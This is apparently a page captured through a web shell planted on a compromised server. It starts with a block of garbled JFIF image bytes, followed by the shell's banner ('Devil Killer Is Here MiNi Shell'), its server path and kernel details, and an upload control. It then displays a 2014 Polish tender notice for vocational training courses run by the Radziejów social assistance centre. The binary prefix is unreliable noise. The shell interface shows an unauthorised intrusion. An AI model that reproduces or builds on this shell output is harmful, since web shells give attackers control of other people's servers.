JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140519/106911-N-2014.html

<p class="kh_header"><b>Radziejów: Organizacja i przeprowadzenie szkoleń-kursów realizowanych przez Gminny
Ośrodek Pomocy Społecznej w Radziejowie  pn. Program aktywizacji zawodowej 
w Gminie Radziejów  współfinansowanego przez Unię Europejską ze środków  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działania 7.1 Rozwój 
i upowszechnienie aktywnej integracji, Podziałanie 7.1.1 Rozwój upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 106911 - 2014; data zamieszczenia: 19.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej , ul. Kościuszki 58, 88-200 Radziejów, woj. kujawsko-pomorskie, tel. 54 231 28 78, faks 54 252 28 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ugradziejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń-kursów realizowanych przez Gminny
Ośrodek Pomocy Społecznej w Radziejowie  pn. Program aktywizacji zawodowej 
w Gminie Radziejów  współfinansowanego przez Unię Europejską ze środków  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działania 7.1 Rozwój 
i upowszechnienie aktywnej integracji, Podziałanie 7.1.1 Rozwój upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: 
Organizacja i przeprowadzenie szkoleń/kursów realizowanych przez Gminny Ośrodek Pomocy Społecznej w Radziejowie  pn. Program aktywizacji zawodowej w Gminie Radziejów  współfinansowanego przez Unię Europejską ze środków  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnienie aktywnej integracji, Podziałanie 7.1.1 Rozwój upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej 
w zakresie:

Grupowe Wsparcie psychologiczne dla 29 osób -16 godzin, zajęcia
Warsztaty doradztwa zawodowego dla 29 osób - 16 godzin, zajęcia grupowe
Profilaktyka uzależnień dla 29 osób - 2 godziny, zajęcia grupowe             
Kurs prawa jazdy kat. B dla 16 osób - 30 godzin zajęcia teoretyczne, 30 godzin zajęcia praktyczne 
Kurs sprzedawca z obsługą kas fiskalnych dla 7 osób - 80 godzin
Kurs operator wózka jezdniowego  dla 12 osób - 60 godzin 
Kurs kucharz - kelner dla 10 osób - 80 godzin
 
1. Grupowe wsparcie psychologiczne:
Zorganizowanie i przeprowadzenie warsztatów wsparcia psychologicznego dla 29 uczestników w wymiarze 16 godzin zajęć.
Celem ogólnym jest poprawa funkcjonowania społecznego uczestników
Cele szczegółowe:
nabycie umiejętności społecznych
podwyższenie zdolności adaptacyjnych
nabycie umiejętności skutecznego wyznaczania i nieagresywnej obrony granic psychologicznych
podniesienie motywacji do skutecznego poszukiwania i utrzymywania pracy
podniesienie motywacji do przeciwdziałania uzależnieniom

2. Warsztaty doradztwa zawodowego:
Zorganizowanie i przeprowadzenie warsztatów doradztwa zawodowego dla 29 uczestników w wymiarze 16 godzin zajęć grupowych.
Dostarczenie wiedzy i umiejętności niezbędnych do wzmocnienia psychologicznego beneficjentów, zachęcenie ich do aktywnego poszukiwania pracy. Wzbudzenie motywacji i zainspirowanie uczestników warsztatów by aktywniej podchodziły do swojej przyszłości na rynku pracy. Zdobycie przez beneficjentów umiejętności prawidłowych zachowań w kontaktach międzyludzkich. 
Cele szczegółowe:
wzmocnienie umiejętności zawodowych
wzmocnienie umiejętności interpersonalnych

3. Profilaktyka uzależnień:
Zorganizowanie i przeprowadzenie pogadanki dla 29 uczestników w wymiarze 2 godzin zajęć grupowych.

4. Kurs prawa jazdy kategorii B:
Zorganizowanie i przeprowadzenie kursu prawo jazdy kat. B w wymiarze 60 godzin (30 godzin zajęcia teoretyczne, 30 godzin zajęcia praktyczne) - dla 16 osób (szkolenie podstawowe) wraz   z egzaminem państwowym. 
Celem szkolenia jest nabycie wiedzy i umiejętności z zakresu przepisów o ruchu drogowym, nabycie praktycznych umiejętności kierowania pojazdem, odpowiednie przygotowanie do przystąpienia do egzaminu państwowego, dającego uprawnienia do prowadzenia pojazdów w w/w kategorii. Program i czas trwania szkolenia musi być zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 27.10.2005 r. w sprawie szkolenia, egzaminowania 
i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834 z późn. zm.). Koszt kursu prawa jazdy obejmuje: materiały szkoleniowe, badania lekarskie, egzamin wewnętrzny, egzamin państwowy w ośrodku egzaminacyjnym. Zajęcia teoretyczne traktowane są jako godziny edukacyjne, natomiast zajęcia praktyczne (jazdy samochodem) jako godziny zegarowe.
Termin realizacji zamówienia: od podpisania umowy do 31 października 2014 r.

5. Kurs sprzedawca z obsługą kas fiskalnych:
Zorganizowanie i przeprowadzenie kursu obsługi kas fiskalnych  - dla 7 osób w wymiarze 80 godzin zajęć. 
Celem kursu jest nabycie umiejętności z zakresu obsługi kasy fiskalnej i terminali kart płatniczych.
Zagadnienia programowe: 
obsługa kasy fiskalnej i terminali kart płatniczych
budowa kas fiskalnych,
praca przy kasie fiskalnej
rejestracja sprzedaży
programowania kas fiskalnych
obsługi urządzeń dodatkowych wspomagających pracę kasjera
rejestracja sprzedaży
 czytnik kodów kreskowych
nowoczesne techniki sprzedaży 
towaroznawstwo, fakturowanie
Termin realizacji zamówienia: od podpisania umowy do 31 października 2014 r

6. Kurs operator wózka jezdniowego:
Zorganizowanie i przeprowadzenie kursu operatora wózków widłowych - dla 12 osób 
w wymiarze 60 godzin:
zajęcia teoretyczne 
zajęcia praktyczne: praktyczna nauka jazdy. 
Ramowy program szkolenia; zajęcia teoretyczne; typy stosowanych wózków jezdniowych, budowa wózka, czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy 
z wózkami, wiadomości z zakresu ładunkoznawstwa, wiadomości z zakresu bhp, wiadomości   o dozorze technicznym. 
Termin realizacji kursu: od podpisania umowy do 31 pażdziernika 2014 r.

7. Kurs kucharz - kelner: 
Zorganizowanie i przeprowadzenie kursu kompleksowej usługi szkoleniowej 
i gastronomicznej  dla 10 osób w wymiarze 80 godzin. 
Prowadzony przez Wykonawcę kurs winien umożliwić nabycie przez uczestników szkolenia umiejętności w szczególności obsługi klientów w gastronomii, umiejętności podawania potraw oraz przyrządzania podstawowych dań. 
Kurs winien zapewniać możliwość odbycia zajęć w lokalu gastronomicznym. 
Kurs należy przeprowadzić w okresie do końca października 2014 r.

Szczegółowe wymagania dotyczące realizacji zamówienia:
1. Zamawiający zastrzega możliwość zmiany ilości kierowanych osób na poszczególne szkolenie. 
2. Godzina zajęć liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut w dni powszednie od poniedziałku do piątku (z wyłączeniem świąt), 
    w przedziale czasowym od 8.00 do 16.00, długość przerw jest ustalana w sposób elastyczny przez Wykonawcę.
3. Wykonawca zapewnia warunki szkolenia zgodne z przepisami bezpieczeństwa i higieny pracy, w trakcie jego trwania. Lokal, w którym będą przeprowadzone zajęcia powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt dostosowany do prowadzenia szkoleń będących przedmiotem zamówienia,
4. Każdy z uczestników szkoleń powinien mieć zapewnione samodzielne i odpowiednio 
    (w sposób adekwatny do zakresu szkolenia) wyposażone stanowisko do nauki . 
5. Zajęcia (teoretyczne i praktyczne) zostaną przeprowadzone w miejscach odpowiednio przystosowanych do przeprowadzenia szkoleń.
6. Do przeprowadzenia zajęć praktycznych Wykonawca zapewni odpowiednią ilość niezbędnego sprzętu i materiałów umożliwiając każdemu uczestnikowi szkoleń swobodne wykonywanie zajęć praktycznych. 
7. Wykonawca zapewni dla potrzeb realizacji przedmiotowych zajęć odpowiednio wykwalifikowany personel oraz odpowiedni, adekwatny do przedmiotu szkoleń, potencjał techniczny,
8. Wykonawca zapewni wszystkim uczestnikom szkolenia catering (obiad drugie danie : ziemniaki, mięso , dwa rodzaje surówek, (w piątek pierogi - ryba) i ziemniaki-ryż-frytki ),oraz bez ograniczeń w ciągu dnia podczas przerw kawa, herbata, 2 rodzaje  soków, woda mineralna, ciastka (min 3 rodzaje), mleczko-śmietanka do kawy, cukier, cytryna  w każdym dniu zajęć,               
9. W trakcie szkolenia Wykonawca zapewnia uczestnikom na własność materiały szkoleniowe 
i dydaktyczne (tj podręczniki ,skrypty zgodne z tematyką szkoleń, spięte trwale, notesy, długopisy, itp Materiały te muszą być oznakowane. Oznakowanie musi być zgodne 
z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym Ministerstwo Rozwoju Regionalnego 4 luty 2009 r. Wszystkie te materiały muszą być przygotowane i rozdane uczestnikom szkolenia najpóźniej w pierwszym dniu zajęć. Uczestnicy kwitują odbiór materiałów własnoręcznym podpisem. Pokwitowanie Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, 
10. Każdorazowo na 7 dni przed rozpoczęciem szkolenia Wykonawca zobowiązany jest do przesłania i uzgodnienia harmonogramu zajęć danego kursu, a Zamawiający imiennej listy uczestników danego szkolenia.
11. Miejsce realizacji zamówienia: Radziejów lub inna miejscowość-miasto na terenie  województwa kujawsko-pomorskiego w odległości nie większej niż 45 km od Radziejowa.
12. W przypadku szkoleń poza siedzibą Zamawiającego, Wykonawca zapewnienia transport uczestnikom szkolenia/kursu (dojazdy uczestników na szkolenie/kurs oraz dojazdy ze szkolenia-kursu) - dotyczy wszystkich kursów prowadzonych w ramach niniejszego postępowania.  
13. Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników szkoleń na kwotę minimalną 10.000,00 zł. Kopię polisy ubezpieczeniowej Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem 
z innymi dokumentami niezbędnymi do rozliczenia całej usługi, 
14. Wykonawca zobowiązany jest do zorganizowania i skierowania uczestników na badania lekarskie, sanitarno-epidemiologiczne , jeśli specyfika szkolenia tego wymaga (wliczone w koszty). Pokrycia kosztów egzaminów wewnętrznych, a w przypadku kursu na prawo jazdy - również pierwszego egzaminu zewnętrznego.
15. Wykonawca zobowiązuje się do zapewnienia w ramach kursów odzieży ochronnej, m.in. rękawice, fartuchy i inne środki ochrony indywidualnej, środki czystości zgodnie 
z obwiązującymi przepisami BHP. 
16. Wykonawca zobowiązany jest do przeprowadzenia wśród uczestników badań ankietowych dwukrotnie  tj. na rozpoczęcie zajęć i  na zakończenie zajęć. Zamawiający otrzyma od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi. 
17. Po zakończeniu szkolenia, kursy zakończą się egzaminem sprawdzającym wiadomości i umiejętności z zakresu danego kursu oraz wydaniem zaświadczeń dla uczestników projektu potwierdzające ukończenie kursu i zdobycie umiejętności, uprawnień i wiedzy zgodnej z jego programem według wzoru stanowiącego załącznik do Rozporządzenia Ministra Edukacji Narodowej z 11 lutego 2012r, w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz.U z 2012 poz.186 z póz zm), bądź Rozporządzeniem Ministra Infrastruktury z dnia 27.10.2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. Nr 217, poz. 1834 z późn. zm.).Ponadto wydane certyfikaty, dyplomy lub zaświadczenia będą oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym Ministerstwo Rozwoju Regionalnego 4 luty 2009 r. 
18. Zaświadczenia/certyfikaty o ukończeniu kursów Wykonawca przekaże w posiadanie uczestnikom za potwierdzeniem czytelnym podpisem w wykazie wydanych zaświadczeń. Zamawiający otrzyma potwierdzenie odbioru zaświadczeń/certyfikatów od Wykonawcy po zakończeniu szkolenia razem z innymi materiałami niezbędnymi do rozliczenia całej usługi, 
19.  Wykonawca zobowiązany jest do prowadzenia i przedstawienia zamawiającemu dokumentacji szkolenia tj dziennika zajęć zawierającego: program i harmonogram szkolenia, wskazanie osób prowadzących zajęcia, wymiar godzin i tematy zajęć edukacyjnych, list obecności w każdym dniu zajęć, ankiet oceniających szkolenie; potwierdzenia odbioru przez uczestnika materiałów szkoleniowych w pierwszym dniu zajęć, potwierdzenia odbioru przez uczestnika wyżywienia w każdym dniu zajęć; zaświadczenia lub certyfikaty o ukończeniu szkolenia; potwierdzenia odbioru przez uczestnika zaświadczeń o ukończeniu szkolenia; polisy ubezpieczeniowej od następstw nieszczęśliwych wypadków wszystkich uczestników zajęć, list potwierdzających zwrot kosztów dojazdu na miejsce szkolenia i z powrotem , rejestru niezbędnych badań lekarskich uczestników szkolenia jeżeli specyfika kursu tego wymaga, protokołu z przeprowadzonego egzaminu końcowego szkolenia (jeśli taki egzamin został przeprowadzony), zdjęć umieszczanych na płycie CD z każdego szkolenia. Dokumentacja ta będzie sporządzona według zaleceń Zamawiającego, tzn Wykonawca zobowiązany jest umieszczać informacje o realizowaniu szkolenia finansowanego z funduszy europejskich na wszystkich dokumentach związanych z jego realizacją oraz w ten sam sposób oznakować miejsce prowadzenia zajęć, zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym Ministerstwo Rozwoju Regionalnego 4 luty 2009. 
20. Wykonawca przygotowuje materiały szkoleniowe dla uczestników oraz dokumenty szkolenia oznakowane poprzez umieszczenie logo UE i EFS oraz informacji o środkach współfinansowania projektu zgodne z Wytycznymi dotyczącymi oznaczania projektów w ramach POKL wydanymi przez Departament Zarządzania Europejskim Funduszem Społecznym Ministerstwo Rozwoju Regionalnego 4 luty 2009 r.
21. Wszystkie dokumenty rozliczeniowe z usługi powinny być podpisane i opieczętowane przez firmę a dokumenty w postaci kserokopii powinny być potwierdzone za zgodność z oryginałem. 
22. Zamawiający przekaże Wykonawcy w dniu podpisania umowy ilościowy wykaz uczestników każdego kursu i wszelkie dane osobowe niezbędne do prawidłowej organizacji szkoleń a Wykonawca zobowiązany będzie do przestrzegania przepisów Ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (Dz.U. z 2002 r. Nr 101 poz. 926 z późn. zm.) przy gromadzeniu oraz przetwarzaniu danych osobowych osób skierowanych na szkolenie.
23. Wykonawca wyznaczy osobę do kontaktu z Zamawiającym, odpowiedzialną za dbałość
o wysoką jakość świadczonych usług i osobę upoważnioną do podejmowania wiążących
decyzji w kwestiach związanych z realizowanymi kursami.
24. Wykonawca umożliwi przeprowadzenie niezapowiedzianych kontroli realizowanego
kursu w miejscu ich odbywania przez osobę wyznaczoną przez Zamawiającego i Instytucję Pośredniczącą.
25. Prowadzone szkolenia zawodowe zostaną umieszczone przez Wykonawcę w bazie danych ofert szkoleniowych na stronie internetowej www.inwestycjawkadry.pl..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.23.20-8, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna dokument Wykonawcy świadczący o wpisie jego firmy do rejestru instytucji szkoleniowych  prowadzonego przez właściwy ze względu na siedzibę instytucji szkoleniowej Wojewódzki Urząd Pracy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna  udokumentowanie przez Wykonawcę  wykazu wykonanych,a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług w ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali minimum trzy z siedmiu wymienionych szkoleń/kursów dla tożsamych lub           podobnych podmiotów będących przedmiotem niniejszego zamówienia ,wraz z podaniem ich           wartości,przedmiotu, dat wykonywania  i podmiotów na rzecz których dostawy lub usługi          zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane          należycie. Zamawiający dokona oceny spełnienia tego warunku na podstawie sporządzonego          przez Wykonawcę  wykazu usług szkoleniowych,  którego wzór stanowi załącznik Nr 5 do          SIWZ wraz z  załączeniem dowodów, że te usługi zostały wykonane należycie lub są          wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku  Zamawiający uzna oświadczenie Wykonawcy, że posiada odpowiedni sprzęt oraz urządzenia niezbędne do przeprowadzenia szkoleń. Zamawiający dokona oceny spełniania tego  warunku na podstawie przedłożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna  dokument złożony przez Wykonawcę wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją 
    o podstawie dysponowania tymi osobami załącznik Nr 7 do SIWZ  oraz oświadczenia Wykonawcy o posiadaniu przez osoby uczestniczące w wykonaniu zamówienia wymaganych uprawnień - załącznik Nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia żadnych wymagań. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie przedłożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu z art. 22 ust 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
